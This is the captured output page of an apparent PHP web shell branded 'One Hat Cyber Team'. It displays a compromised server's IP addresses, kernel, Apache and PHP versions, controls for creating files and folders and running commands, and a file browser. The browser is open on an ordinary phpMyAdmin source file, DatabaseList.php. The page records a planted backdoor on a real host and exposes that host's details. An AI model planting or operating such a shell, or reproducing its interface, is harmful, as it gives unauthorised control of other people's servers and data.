One Hat Cyber Team
Your IP :
172.70.50.39
Server IP :
188.114.97.7
Server :
Linux advantage-project 5.14.0-503.26.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 19 16:28:19 UTC 2025 x86_64
Server Software :
Apache/2.4.62 (Rocky Linux) OpenSSL/3.2.2
PHP Version :
8.3.17
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
phpMyAdmin
/
libraries
/
classes
/
Database
/
View File Name :
DatabaseList.php
<?php declare(strict_types=1); namespace PhpMyAdmin\Database; use PhpMyAdmin\ListDatabase; class DatabaseList { /** * Holds database list * * @var ListDatabase */ protected $databases = null; /** * magic access to protected/inaccessible members/properties * * @see https://www.php.net/language.oop5.overloading * * @param string $param parameter name * * @return mixed */ public function __get($param) { switch ($param) { case 'databases': return $this->getDatabaseList(); } return null; } /** * Accessor to PMA::$databases */ public function getDatabaseList(): ListDatabase { if ($this->databases === null) { $this->databases = new ListDatabase(); } return $this->databases; } }